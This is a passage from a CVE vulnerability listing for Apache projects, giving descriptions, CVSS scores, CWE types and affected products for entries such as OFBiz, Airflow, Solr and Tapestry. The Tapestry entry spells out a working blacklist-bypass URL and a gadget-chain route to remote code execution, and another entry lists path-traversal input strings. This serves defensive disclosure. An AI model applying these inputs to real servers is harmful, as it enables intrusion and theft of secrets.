apache maven *
CVE-2021-26295 HIGH

Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2021-26296 MEDIUM

In the default configuration, Apache MyFaces Core versions 2.2.0 to 2.2.13, 2.3.0 to 2.3.7, 2.3-next-M1 to 2.3-next-M4, and 3.0.0-RC1 use cryptographically weak implicit and explicit cross-site request forgery (CSRF) tokens. Due to that limitation, it is possible (although difficult) for an attacker to calculate a future CSRF token value and to use that value to trick a user into executing unwanted actions on an application.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H 1.6 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,CWE-352,

Products Affected

Vendor Product Version
apache myfaces 3.0.0
netapp oncommand_insight -
apache myfaces *
apache myfaces 2.3
CVE-2021-26461 HIGH

Apache Nuttx Versions prior to 10.1.0 are vulnerable to integer wrap-around in functions malloc, realloc and memalign. This improper memory assignment can lead to arbitrary memory allocation, resulting in unexpected behavior such as a crash or a remote code injection/execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-190,CWE-190,

Products Affected

Vendor Product Version
apache nuttx *
CVE-2021-26544 LOW

Livy server version 0.7.0-incubating (only) is vulnerable to a cross site scripting issue in the session name. A malicious user could use this flaw to access logs and results of other users' sessions and run jobs with their privileges. This issue is fixed in Livy 0.7.1-incubating.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,CWE-79,

Products Affected

Vendor Product Version
apache livy 0.7.0-incubating
CVE-2021-26558 MEDIUM

Deserialization of Untrusted Data vulnerability of Apache ShardingSphere-UI allows an attacker to inject outer link resources. This issue affects Apache ShardingSphere-UI version 4.1.1 and later versions; Apache ShardingSphere-UI versions prior to 5.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,CWE-502,

Products Affected

Vendor Product Version
apache shardingsphere-ui *
CVE-2021-26559 MEDIUM

Improper Access Control on Configurations Endpoint for the Stable API of Apache Airflow allows users with Viewer or User role to get Airflow Configurations including sensitive information even when `[webserver] expose_config` is set to `False` in `airflow.cfg`. This allowed a privilege escalation attack. This issue affects Apache Airflow 2.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,NVD-CWE-Other,

Products Affected

Vendor Product Version
apache airflow 2.0.0
CVE-2021-26690 MEDIUM

In Apache HTTP Server versions 2.4.0 to 2.4.46, a specially crafted Cookie header handled by mod_session can cause a NULL pointer dereference and crash, leading to a possible denial of service.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 34
debian debian_linux 9.0
oracle instantis_enterprisetrack 17.1
oracle zfs_storage_appliance_kit 8.8
debian debian_linux 10.0
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle enterprise_manager_ops_center 12.4.0.0
CVE-2021-26691 HIGH

In Apache HTTP Server versions 2.4.0 to 2.4.46, a specially crafted SessionHeader sent by an origin server could cause a heap overflow.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-122,CWE-787,

Products Affected

Vendor Product Version
apache http_server *
debian debian_linux 9.0
oracle instantis_enterprisetrack 17.1
debian debian_linux 10.0
oracle enterprise_manager_ops_center 12.4.0.0
fedoraproject fedora 35
netapp cloud_backup -
fedoraproject fedora 34
oracle secure_backup *
oracle zfs_storage_appliance_kit 8.8
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
CVE-2021-26697 MEDIUM

The lineage endpoint of the deprecated Experimental API was not protected by authentication in Airflow 2.0.0. This allowed unauthenticated users to hit that endpoint. This is a low-severity issue, as the attacker needs to be aware of certain parameters to pass to that endpoint, and even then can only obtain some metadata about a DAG and a Task. This issue affects Apache Airflow 2.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-269,CWE-306,

Products Affected

Vendor Product Version
apache airflow 2.0.0
CVE-2021-26919 MEDIUM

Apache Druid allows users to read data from other database systems using JDBC. This functionality is intended to allow trusted users with the proper permissions to set up lookups or submit ingestion tasks. The MySQL JDBC driver supports certain properties which, if left unmitigated, can allow an attacker to execute arbitrary code from an attacker-controlled malicious MySQL server within Druid server processes. This issue was addressed in Apache Druid 0.20.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache druid *
CVE-2021-26920 MEDIUM

In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-610,

Products Affected

Vendor Product Version
apache druid *
CVE-2021-27576 MEDIUM

It was found that the NetTest web service can be used to overload the bandwidth of an Apache OpenMeetings server. This issue was addressed in Apache OpenMeetings 6.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2021-27577 MEDIUM

Incorrect handling of the URL fragment in Apache Traffic Server allows an attacker to poison the cache. This issue affects Apache Traffic Server 7.0.0 to 7.1.12, 8.0.0 to 8.1.1, and 9.0.0 to 9.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
apache traffic_server *
debian debian_linux 8.0
CVE-2021-27578 MEDIUM

Cross-Site Scripting vulnerability in the Markdown interpreter of Apache Zeppelin allows an attacker to inject malicious scripts. This issue affects Apache Zeppelin versions prior to 0.9.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2021-27644 MEDIUM

In Apache DolphinScheduler versions before 1.3.6, authorized users can perform SQL injection in the data source center (only applicable to the MySQL data source with an internal login account and password).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,CWE-89,

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2021-27737 MEDIUM

Apache Traffic Server 9.0.0 is vulnerable to a remote DoS attack on the experimental Slicer plugin.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache traffic_server 9.0.0
CVE-2021-27738 MEDIUM

All request mappings in `StreamingCoordinatorController.java` handling `/kylin/api/streaming_coordinator/*` REST API endpoints did not include any security checks, which allowed an unauthenticated user to issue arbitrary requests, such as assigning/unassigning of streaming cubes and creation/modification and deletion of replica sets, to the Kylin Coordinator. For endpoints accepting node details in the HTTP message body, unauthenticated (but limited) server-side request forgery (SSRF) can be achieved. This issue affects Apache Kylin 3 versions prior to 3.1.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,

Products Affected

Vendor Product Version
apache kylin *
CVE-2021-27807 MEDIUM

A carefully crafted PDF file can trigger an infinite loop while loading the file. This issue affects Apache PDFBox version 2.0.22 and prior 2.0.x versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-834,

Products Affected

Vendor Product Version
oracle webcenter_sites 12.2.1.4.0
oracle flexcube_universal_banking *
oracle banking_virtual_account_management 14.2.0
oracle hyperion_infrastructure_technology *
oracle hyperion_financial_reporting 11.2.6.0
oracle communications_session_report_manager *
fedoraproject fedora 32
oracle retail_xstore_point_of_service 20.0.1
fedoraproject fedora 34
oracle primavera_unifier *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle banking_trade_finance_process_management 14.5.0
oracle retail_xstore_point_of_service 16.0.6
oracle primavera_unifier 20.12
oracle primavera_unifier 18.8
oracle retail_xstore_point_of_service 17.0.4
oracle flexcube_universal_banking 14.5.0
apache pdfbox *
oracle retail_xstore_point_of_service 19.0.2
oracle banking_treasury_management 14.5
oracle hyperion_financial_reporting 11.1.2.4
oracle primavera_unifier 19.12
oracle banking_trade_finance_process_management 14.3.0
oracle outside_in_technology 8.5.5
oracle webcenter_sites 12.2.1.3.0
oracle banking_trade_finance_process_management 14.2.0
oracle communications_messaging_server 8.1
oracle retail_customer_management_and_segmentation_foundation 19.0
oracle banking_virtual_account_management 14.3.0
fedoraproject fedora 33
CVE-2021-27850 HIGH

A critical unauthenticated remote code execution vulnerability was found in all recent versions of Apache Tapestry. The affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. The vulnerability I have found is a bypass of the fix for CVE-2019-0195. Recap: Before the fix of CVE-2019-0195 it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL. An attacker was able to download the file `AppModule.class` by requesting the URL `http://localhost:8080/assets/something/services/AppModule.class`, which contains an HMAC secret key. The fix for that bug was a blacklist filter that checks if the URL ends with `.class`, `.properties` or `.xml`. Bypass: Unfortunately, the blacklist solution can simply be bypassed by appending a `/` at the end of the URL: `http://localhost:8080/assets/something/services/AppModule.class/` The slash is stripped after the blacklist check and the file `AppModule.class` is loaded into the response. This class usually contains the HMAC secret key which is used to sign serialized Java objects. With the knowledge of that key an attacker can sign a Java gadget chain that leads to RCE (e.g. CommonsBeanUtils1 from ysoserial). Solution for this vulnerability: * For Apache Tapestry 5.4.0 to 5.6.1, upgrade to 5.6.2 or later. * For Apache Tapestry 5.7.0, upgrade to 5.7.1 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-200,CWE-502,

Products Affected

Vendor Product Version
apache tapestry *
CVE-2021-27905 HIGH

The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent an SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-918,

Products Affected

Vendor Product Version
apache solr *
CVE-2021-27906 MEDIUM

A carefully crafted PDF file can trigger an OutOfMemory exception while loading the file. This issue affects Apache PDFBox version 2.0.22 and prior 2.0.x versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-789,NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle webcenter_sites 12.2.1.4.0
oracle banking_corporate_lending_process_management 14.3.0
oracle banking_supply_chain_finance 14.3.0
oracle banking_credit_facilities_process_management 14.3.0
oracle flexcube_universal_banking *
oracle banking_virtual_account_management 14.2.0
oracle hyperion_infrastructure_technology *
oracle hyperion_financial_reporting 11.2.6.0
oracle communications_session_report_manager *
fedoraproject fedora 32
oracle retail_xstore_point_of_service 20.0.1
fedoraproject fedora 34
oracle peoplesoft_enterprise_peopletools 8.58
oracle banking_credit_facilities_process_management 14.5.0
oracle primavera_unifier *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle banking_trade_finance_process_management 14.5.0
oracle retail_xstore_point_of_service 16.0.6
oracle banking_supply_chain_finance 14.2.0
oracle primavera_unifier 20.12
oracle primavera_unifier 18.8
oracle retail_xstore_point_of_service 17.0.4
oracle flexcube_universal_banking 14.5.0
apache pdfbox *
oracle retail_xstore_point_of_service 19.0.2
oracle banking_corporate_lending_process_management 14.5.0
oracle banking_treasury_management 14.5
oracle hyperion_financial_reporting 11.1.2.4
oracle banking_corporate_lending_process_management 14.2.0
oracle banking_supply_chain_finance 14.5.0
oracle primavera_unifier 19.12
oracle banking_trade_finance_process_management 14.3.0
oracle outside_in_technology 8.5.5
oracle banking_credit_facilities_process_management 14.2.0
oracle webcenter_sites 12.2.1.3.0
oracle banking_trade_finance_process_management 14.2.0
oracle communications_messaging_server 8.1
oracle retail_customer_management_and_segmentation_foundation 19.0
oracle banking_virtual_account_management 14.3.0
fedoraproject fedora 33
CVE-2021-27907 LOW

Apache Superset up to and including 0.38.0 allowed the creation of a Markdown component on a Dashboard page for describing a chart's related information. Abusing this functionality, a malicious user could inject JavaScript code that executes unwanted actions in the context of the user's browser. The JavaScript code will be automatically executed (Stored XSS) when a legitimate user visits the dashboard page. The vulnerability is exploitable by creating a "div" section and embedding in it an "svg" element with JavaScript code.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache superset *
CVE-2021-28125 MEDIUM

Apache Superset up to and including 1.0.1 allowed for the creation of an external URL that could be malicious. Because user input was not checked for open redirects, the URL shortener functionality allowed a malicious user to create a short URL for a dashboard that could be used to convince a user to click the link.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-601,

Products Affected

Vendor Product Version
apache superset *
CVE-2021-28129 MEDIUM

While working on Apache OpenOffice 4.1.8 a developer discovered that the DEB package did not install using root, but instead used a userid and groupid of 500. This both caused issues with desktop integration and could allow a crafted attack on files owned by that user or group if they exist. Users who installed the Apache OpenOffice 4.1.8 DEB packaging should upgrade to the latest version of Apache OpenOffice.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,NVD-CWE-Other,

Products Affected

Vendor Product Version
apache openoffice 4.1.8
CVE-2021-28131 MEDIUM

Impala sessions use a 16 byte secret to verify that the session is not being hijacked by another user. However, these secrets appear in the Impala logs, therefore Impala users with access to the logs can use another authenticated user's sessions with specially constructed requests. This means the attacker is able to execute statements for which they don't have the necessary privileges otherwise. Impala deployments with Apache Sentry or Apache Ranger authorization enabled may be vulnerable to privilege escalation if an authenticated attacker is able to hijack a session or query from another authenticated user with privileges not assigned to the attacker. Impala deployments with audit logging enabled may be vulnerable to incorrect audit logging as a user could undertake actions that were logged under the name of a different authenticated user. Constructing an attack requires a high degree of technical sophistication and access to the Impala system as an authenticated user. Mitigation: If an Impala deployment uses Apache Sentry, Apache Ranger or audit logging, then users should upgrade to a version of Impala with the fix for IMPALA-10600. The Impala 4.0 release includes this fix. This hides session secrets from the logs to eliminate the risk of any attack using this mechanism. In lieu of an upgrade, restricting access to logs that expose secrets will reduce the risk of an attack. Restricting access to the Impala deployment to trusted users will also reduce the risk of an attack. Log redaction techniques can be used to redact secrets from the logs.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-288,CWE-532,

Products Affected

Vendor Product Version
apache impala *
CVE-2021-28163 MEDIUM

In Eclipse Jetty 9.4.32 to 9.4.38, 10.0.0.beta2 to 10.0.1, and 11.0.0.beta2 to 11.0.1, if a user uses a webapps directory that is a symlink, the contents of the webapps directory are deployed as a static webapp, inadvertently serving the webapps themselves and anything else that might be in that directory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
emo@eclipse.org 2.7 LOW CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N 1.2 1.4
nvd@nist.gov 2.7 LOW CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N 1.2 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,CWE-59,

Products Affected

Vendor Product Version
eclipse jetty 11.0.1
oracle communications_session_route_manager *
netapp santricity_cloud_connector -
netapp e-series_performance_analyzer -
oracle banking_apis 21.1
apache solr 8.8.1
eclipse jetty 11.0.0
eclipse jetty 10.0.0
netapp e-series_santricity_os_controller *
eclipse jetty *
oracle communications_session_report_manager *
fedoraproject fedora 32
netapp element_plug-in_for_vcenter_server -
fedoraproject fedora 34
oracle banking_digital_experience 20.1
netapp vasa_provider_for_clustered_data_ontap *
oracle banking_digital_experience 21.1
eclipse jetty 10.0.1
apache ignite *
oracle communications_services_gatekeeper 7.0
netapp e-series_santricity_web_services -
netapp snapcenter -
netapp storage_replication_adapter_for_clustered_data_ontap *
oracle communications_element_manager 8.2.2
oracle siebel_core_-_automation *
netapp snapcenter_plug-in -
netapp cloud_manager -
oracle autovue_for_agile_product_lifecycle_management 21.0.2
netapp virtual_storage_console *
fedoraproject fedora 33
oracle banking_apis 20.1
CVE-2021-28359 MEDIUM

The "origin" parameter passed to some of the endpoints like '/trigger' was vulnerable to an XSS exploit. This issue affects Apache Airflow versions <1.10.15 in the 1.x series, and versions 2.0.0 and 2.0.1 in the 2.x series. This is the same as CVE-2020-13944 & CVE-2020-17515, but the implemented fix did not fix the issue completely. Update to Airflow 1.10.15 or 2.0.2. Please also update your Python version to the latest available PATCH release of the installed MINOR version; for example, update to Python 3.6.13 if you are on Python 3.6. (Those contain the fix for CVE-2021-23336 https://nvd.nist.gov/vuln/detail/CVE-2021-23336).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2021-28544 LOW

Apache Subversion SVN authz protected copyfrom paths regression: Subversion servers reveal 'copyfrom' paths that should be hidden according to configured path-based authorization (authz) rules. When a node has been copied from a protected location, users with access to the copy can see the 'copyfrom' path of the original. This also reveals the fact that the node was copied. Only the 'copyfrom' path is revealed, not its contents. Both httpd and svnserve servers are vulnerable.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apple macos *
apache subversion *
fedoraproject fedora 36
debian debian_linux 10.0
debian debian_linux 11.0
CVE-2021-28655

An improper input validation vulnerability in the "Move folder to Trash" feature of Apache Zeppelin allows an attacker to delete arbitrary files. This issue affects Apache Zeppelin version 0.9.0 and prior versions.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2021-28656

Cross-Site Request Forgery (CSRF) vulnerability in the Credential page of Apache Zeppelin allows an attacker to submit a malicious request. This issue affects Apache Zeppelin version 0.9.0 and prior versions.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2021-28657 MEDIUM

A carefully crafted or corrupt file may trigger an infinite loop in Tika's MP3Parser up to and including Tika 1.25. Apache Tika users should upgrade to 1.26 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
oracle primavera_unifier 20.12
oracle primavera_unifier 19.12
oracle healthcare_foundation 8.0.0
apache tika *
oracle webcenter_portal 12.2.1.3.0
oracle primavera_unifier *
oracle primavera_unifier 18.8
oracle healthcare_foundation 8.1.0
oracle webcenter_portal 12.2.1.4.0
oracle communications_messaging_server 8.1
oracle healthcare_foundation 7.3.0
CVE-2021-29200 HIGH

Apache OFBiz has unsafe deserialization prior to version 17.12.07. An unauthenticated user can perform an RCE attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2021-29262 MEDIUM

When starting Apache Solr versions prior to 8.8.2, configured with the SaslZkACLProvider or VMParamsAllAndReadonlyDigestZkACLProvider and no existing security.json znode, if the optional read-only user is configured then Solr would not treat that node as a sensitive path and would allow it to be readable. Additionally, with any ZkACLProvider, if the security.json is already present, Solr will not automatically update the ACLs.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-522,

Products Affected

Vendor Product Version
apache solr *
CVE-2021-29425 MEDIUM

In Apache Commons IO before 2.7, when invoking the method FileNameUtils.normalize with an improper input string, like "//../foo" or "\\..\foo", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus "limited" path traversal), if the calling code used the result to construct a path value.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N 2.2 2.5

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-22,

Products Affected

Vendor Product Version
oracle financial_services_model_management_and_governance *
oracle rest_data_services *
oracle agile_engineering_data_management 6.2.1.0
oracle enterprise_session_border_controller 9.0
apache commons_io 2.2
oracle banking_apis 18.2
oracle health_sciences_data_management_workbench 2.5.2.1
oracle communications_interactive_session_recorder 6.3
oracle flexcube_core_banking 11.10.0
oracle banking_digital_experience 18.3
oracle primavera_unifier *
oracle insurance_rules_palette 11.2.8
oracle retail_xstore_point_of_service 18.0.3
oracle banking_digital_experience 19.1
oracle retail_integration_bus 15.0.3.1
oracle solaris_cluster 4.0
oracle retail_pricing 19.0.1
oracle weblogic_server 12.2.1.3.0
oracle retail_merchandising_system 19.0.1
oracle communications_offline_mediation_controller 12.0.0.3
oracle communications_billing_and_revenue_management_elastic_charging_engine 11.3
oracle webcenter_portal 12.2.1.3.0
oracle retail_assortment_planning 16.0.3
oracle helidon 1.4.7
oracle communications_cloud_native_core_unified_data_repository 1.4.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0
oracle application_performance_management 13.5.1.0
oracle utilities_testing_accelerator 6.0.0.3.1
oracle banking_apis 19.1
oracle fusion_middleware_mapviewer 12.2.1.4.0
oracle weblogic_server 14.1.1.0.0
oracle communications_order_and_service_management 7.3
oracle banking_platform 2.6.2
oracle banking_apis 18.3
oracle retail_service_backbone 15.0.3.1
oracle insurance_policy_administration 11.0.2
oracle communications_design_studio 7.3.5
oracle communications_order_and_service_management 7.4
oracle communications_contacts_server 8.0.0.6.0
oracle retail_integration_bus 14.1.3.2
oracle banking_apis 18.1
oracle application_performance_management 13.4.1.0
oracle retail_integration_bus 13.0
oracle flexcube_core_banking 5.2.0
oracle insurance_policy_administration 11.3.0
oracle healthcare_data_repository 8.1.0
oracle banking_digital_experience 21.1
oracle primavera_unifier 20.12
oracle primavera_unifier 21.12
oracle banking_enterprise_default_management 2.7.0
apache commons_io 2.5
oracle health_sciences_information_manager *
oracle banking_digital_experience 18.1
oracle oss_support_tools *
oracle retail_service_backbone *
oracle health_sciences_data_management_workbench 3.0.0.0
oracle retail_integration_bus 19.0.1
oracle banking_apis 19.2
oracle banking_enterprise_default_management 2.10.0
oracle insurance_rules_palette 11.0.2
oracle communications_converged_application_server_-_service_controller 6.2
oracle communications_convergence 3.0.2.2.0
oracle retail_integration_bus 19.0.0
apache commons_io 2.4
oracle insurance_policy_administration 11.1.0
oracle access_manager 12.2.1.3.0
oracle enterprise_communications_broker 3.3
oracle communications_policy_management 12.5.0.0.0
oracle banking_enterprise_default_management 2.6.2
oracle banking_enterprise_default_management 2.7.1
oracle retail_integration_bus 14.1.3.0
oracle retail_xstore_point_of_service 20.0.1
oracle retail_merchandising_system 16.0.3
oracle banking_digital_experience 20.1
oracle insurance_policy_administration 11.2.8
oracle agile_plm 9.3.6
oracle blockchain_platform *
oracle flexcube_core_banking *
oracle retail_service_backbone 19.0.1
oracle communications_cloud_native_core_policy 1.14.0
apache commons_io 2.3
oracle communications_application_session_controller 3.9.0
oracle insurance_rules_palette 11.1.0
oracle banking_digital_experience 17.2
debian debian_linux 9.0
oracle primavera_unifier 18.8
oracle retail_xstore_point_of_service 17.0.4
oracle rest_data_services 21.3
oracle webcenter_portal 12.2.1.4.0
oracle banking_digital_experience 19.2
oracle retail_order_broker 19.1
oracle application_testing_suite 13.3.0.1
oracle primavera_unifier 19.12
oracle communications_interactive_session_recorder 6.4
oracle access_manager 12.2.1.4.0
oracle retail_service_backbone 19.0.0
oracle banking_platform 2.7.1
oracle utilities_testing_accelerator 6.0.0.1.1
oracle banking_enterprise_default_management 2.12.0
apache commons_io 2.6
oracle banking_apis 20.1
oracle insurance_policy_administration 11.3.1
oracle insurance_rules_palette 11.3.0
oracle helidon 2.2.0
oracle access_manager 11.1.2.3.0
oracle commerce_guided_search 11.3.2
oracle banking_platform 2.7.0
oracle financial_services_analytical_applications_infrastructure *
oracle communications_design_studio *
oracle banking_apis 21.1
oracle retail_integration_bus *
oracle banking_party_management 2.7.0
oracle insurance_rules_palette 11.3.1
oracle utilities_testing_accelerator 6.0.0.2.2
oracle banking_enterprise_default_managment *
oracle communications_diameter_intelligence_hub *
oracle retail_service_backbone 14.1.3.0
oracle weblogic_server 12.2.1.4.0
oracle real_user_experience_insight 13.4.1.0
oracle communications_service_broker 6.2
oracle banking_platform *
oracle retail_order_broker 16.0
oracle real_user_experience_insight 13.5.1.0
oracle communications_cloud_native_core_network_repository_function 1.14.0
oracle retail_xstore_point_of_service 19.0.2
